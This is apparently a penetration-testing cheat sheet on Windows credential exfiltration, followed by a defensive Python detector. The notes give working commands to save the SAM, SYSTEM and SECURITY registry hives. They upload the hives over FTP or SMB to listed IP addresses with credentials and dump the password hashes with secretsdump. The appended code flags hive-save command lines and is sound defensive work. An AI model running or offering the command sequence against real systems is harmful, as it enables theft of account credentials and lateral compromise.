Exfiltration
Dump the SAM hive to the pwd
reg.exe save HKLM\SAM sam.bak
Dump the System hive to the pwd
reg.exe save HKLM\SYSTEM system.bak
Dump the Security hive to the pwd
reg.exe save HKLM\SECURITY security.bak
Spin up an SMB server
impacket-smbserver share share/ -smb2support -username user -password password1
Alternatively, build an FTP script that uploads the hives
echo open 10.9.254.6 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\Users\Administrator\Desktop\sam.bak >> ftp.txt && echo put C:\Users\Administrator\Desktop\system.bak >> ftp.txt && echo bye >> ftp.txt
Run the FTP script
ftp -v -n -s:ftp.txt
Exfiltrate data
net use \\10.50.102.164\share /USER:adot8\user password1
move sam.bak \\10.50.102.164\share\sam.bak
move system.bak \\10.50.102.164\share\system.bak
Dump hashes with secretsdump
secretsdump.py -sam sam.bak -system system.bak local
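Defender's view of the steps above, as an added example that is not part of the original notes: a Python check that flags `reg save` of the SAM, SYSTEM and SECURITY hives in process command lines and raises severity when SAM and SYSTEM are both saved on one host, the pair secretsdump is given above. The event dicts, host names and the `hive_saved`/`triage` helpers are constructed for illustration.

```python
import re
from collections import defaultdict

# reg(.exe) save HKLM\<hive> <file>; tolerates full path, quotes, case, long root name.
# The lookahead rejects subkey saves such as HKLM\SYSTEM\CurrentControlSet\...
HIVE_SAVE = re.compile(
    r'(?:^|[\\/\s"])reg(?:\.exe)?"?\s+save\s+"?'
    r'(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)(?=["\s]|$)',
    re.IGNORECASE,
)

def hive_saved(cmdline):
    """Return the name of the whole hive a command line saves, or None."""
    m = HIVE_SAVE.search(cmdline)
    return m.group(1).upper() if m else None

def triage(events):
    """Group hive saves per host; SAM + SYSTEM on one host is rated high."""
    seen = defaultdict(set)
    for ev in events:
        hive = hive_saved(ev["cmdline"])
        if hive:
            seen[ev["host"]].add(hive)
    return {
        host: ("high" if {"SAM", "SYSTEM"} <= hives else "medium", sorted(hives))
        for host, hives in seen.items()
    }

# Constructed sample process-creation events (the kind of command lines
# recorded by Security event 4688 or Sysmon event 1 with command-line logging)
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": r"reg.exe save HKLM\SAM sam.bak"},
    {"host": "WS01", "cmdline": r"reg.exe save HKLM\SYSTEM system.bak"},
    {"host": "WS01", "cmdline": r"reg.exe save HKLM\SECURITY security.bak"},
    {"host": "WS02", "cmdline": r'"C:\Windows\System32\reg.exe" SAVE hkey_local_machine\security C:\t\s.bak'},
    {"host": "WS03", "cmdline": r"reg.exe save HKLM\SYSTEM\CurrentControlSet\Services svc.bak"},
    {"host": "WS03", "cmdline": r"reg.exe query HKLM\SAM"},
]

if __name__ == "__main__":
    for host, (severity, hives) in triage(SAMPLE_EVENTS).items():
        print(host, severity, hives)
```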